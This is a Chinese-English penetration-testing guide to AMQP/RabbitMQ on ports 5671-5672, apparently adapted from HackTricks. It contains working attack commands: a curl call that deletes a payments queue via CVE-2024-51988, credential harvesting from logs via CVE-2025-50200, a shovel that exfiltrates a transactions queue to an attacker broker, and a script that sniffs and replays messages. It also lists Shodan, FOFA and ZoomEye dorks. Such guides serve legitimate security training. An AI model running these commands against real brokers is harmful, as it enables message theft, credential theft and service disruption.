5671 - Amqp

💡 学习提示: 本文档介绍 5671-5672 - AMQP 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

A message can include any kind of information. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.
Definition from .

默认 port: 5672,5671

PORT     STATE SERVICE VERSION
5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)

• 默认 credentials: guest:guest. RabbitMQ restricts them to localhost through loopback_users, but many Docker/IoT images disable that check, so always test remote login before assuming it is blocked.
• 认证 mechanisms: PLAIN and AMQPLAIN are enabled by default, ANONYMOUS is mapped to anonymous_login_user/anonymous_login_pass, and EXTERNAL (x509) can be exposed when TLS is enabled. Enumerate what the broker advertises so you know whether to try password spraying or certificate impersonation later.

信息收集

Manual

import amqp
## By default it uses "guest":"guest"
conn = amqp.connection.Connection(host="IP", port=5672, virtual_host="/")
conn.connect()
print("SASL mechanisms:", conn.mechanisms)
for k, v in conn.server_properties.items():
    print(k, v)

Once authenticated, dump conn.server_properties, conn.channel_max and conn.frame_max to understand throughput limits and whether you can exhaust resources with oversized frames.

Automatic

nmap -sV -Pn -n -T4 -p 5672 --script amqp-info IP

PORT     STATE SERVICE VERSION
5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)
| amqp-info:
|   capabilities:
|     publisher_confirms: YES
|     exchange_exchange_bindings: YES
|     basic.nack: YES
|     consumer_cancel_notify: YES
|   copyright: Copyright (C) 2007-2013 GoPivotal, Inc.
|   information: Licensed under the MPL.  See http://www.rabbitmq.com/
|   platform: Erlang/OTP
|   product: RabbitMQ
|   version: 3.1.5
|   mechanisms: PLAIN AMQPLAIN
|_  locales: en_US

TLS/SASL checks

• Probe AMQPS:

  openssl s_client -alpn amqp -connect IP:5671 -tls1_3 -msg </dev/null

  This leaks the certificate chain, supported TLS versions and whether mutual TLS is required.
• List listeners without creds:

  rabbitmq-diagnostics -q listeners

  Useful once you get low-priv shell access to the host.
• Spot ANONYMOUS logins: if the broker allows the ANONYMOUS SASL mechanism, try connecting with an empty username/password; RabbitMQ will internally map you to the anonymous_login_user (defaults to guest).

暴力破解

漏洞利用 Tips

Queue deletion without configure perms (CVE-2024-51988)

RabbitMQ ≤ 3.12.10 (and unpatched Tanzu builds) fail to check the configure permission when queues are deleted via the HTTP API. Any authenticated user with access to the target vhost can nuke arbitrary queues even if they only have read or write rights.

## confirm vulnerable version first
rabbitmqadmin -H target -P 15672 -u user -p pass show overview | grep -i version
## delete a high-value queue
curl -k -u user:pass -X DELETE https://target:15672/api/queues/%2F/payments-processing

Combine this with rabbitmqadmin list permissions to find vhosts where your low-priv user has partial access, then wipe queues to induce denial of service or trigger compensating controls observed on the AMQP side. Check 15672 pentesting for more HTTP API endpoints to chain with this bug.

Harvest credentials from RabbitMQ logs (CVE-2025-50200)

Until 4.0.8/4.1.0, hitting the management API with HTTP basic auth on a non-existent resource causes the broker to log the entire 授权 header (base64). If you gain limited filesystem access (e.g. Docker escape, plugin 远程代码执行), search /var/log/rabbitmq/rabbit@*.log for 授权: and recover credentials for other tenants or service accounts.

curl -k -u pentester:SuperSecret https://target:15672/api/queues/%2f/ghost
sudo grep -R "Authorization:" /var/log/rabbitmq | cut -d' ' -f3 | base64 -d

Trigger this intentionally with bogus endpoints to plant fresh secrets in the logs, then pivot by reusing the decoded creds over AMQP, STOMP, MQTT or the OS itself.

Weaponize rabbitmqadmin-ng

rabbitmqadmin v2 (aka rabbitmqadmin-ng) is a self-contained CLI that talks to the management API and now ships statically linked builds for Linux/macOS/Windows. Drop it on your bounce box and script:

## enumerate live channels and prefetch pressure
rabbitmqadmin --host target --port 15672 --username user --password pass channels list --non-interactive
## clone a shovel to exfiltrate messages to attacker-controlled broker
rabbitmqadmin shovels declare_amqp091 \
  --name loot \
  --source-uri amqp://user:pass@target:5672/%2f \
  --destination-uri amqp://attacker:pw@vps:5672/%2f \
  --source-queue transactions \
  --destination-queue stolen

Because the tool supports blue/green aware health checks, you can also abuse rabbitmqadmin health_check port_listener --port 5672 to remotely confirm whether TLS listeners were exposed or to keep the service busy for timing probes.

Message hijacking/sniffing

If you find permissive policies (.* bindings, topic exchanges, or x-queue-master-locator = min-masters), you can quietly siphon messages without deleting them:

import pika
creds = pika.PlainCredentials('user','pass')
conn = pika.BlockingConnection(pika.ConnectionParameters('IP', 5672, '/', creds))
ch = conn.channel()
ch.queue_declare(queue='loot', exclusive=True, auto_delete=True)
ch.queue_bind(queue='loot', exchange='amq.topic', routing_key='#')
for method, props, body in ch.consume('loot', inactivity_timeout=5):
    if body:
        print(method.routing_key, body)

Swap the routing key for audit.# or payments.* to focus on sensitive flows, then republish forged messages by flipping basic_publish arguments—handy for replay attacks against downstream microservices.

Other RabbitMQ ports

In https://www.rabbitmq.com/networking.html you can find that rabbitmq uses several ports:

• 1883, 8883: (MQTT clients without and with TLS, if the MQTT plugin is enabled. Learn more about how to pentest MQTT here.
• 4369: epmd, a peer discovery service used by RabbitMQ nodes and CLI tools. Learn more about how to pentest this service here.
• 5672, 5671: used by AMQP 0-9-1 and 1.0 clients without and with TLS
• 15672: HTTP API clients, management UI and rabbitmqadmin (only if the management plugin is enabled). Learn more about how to pentest this service here.
• 15674: STOMP-over-WebSockets clients (only if the Web STOMP plugin is enabled)
• 15675: MQTT-over-WebSockets clients (only if the Web MQTT plugin is enabled)
• 15692: Prometheus metrics (only if the Prometheus plugin is enabled)
• 25672: used for inter-node and CLI tools communication (Erlang distribution server port) and is allocated from a dynamic range (limited to a single port by default, computed as AMQP port + 20000). Unless external connections on these ports are really necessary (e.g. the cluster uses federation or CLI tools are used on machines outside the subnet), these ports should not be publicly exposed. See networking guide for details. Only 9 of these ports opened on the internet.
• 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and is allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See networking guide for details.
• 61613, 61614: STOMP clients without and with TLS (only if the STOMP plugin is enabled). Less than 10 devices with this port open and mostly UDP for DHT nodes.

参见

4222-pentesting-nats.md

Shodan

• AMQP

搜索引擎语法

FOFA

# FOFA 搜索语法
port="5671"

Shodan

# Shodan 搜索语法
port:5671

ZoomEye

# ZoomEye 搜索语法
port:5671

📖 参考资料

• HackTricks - 5671-amqp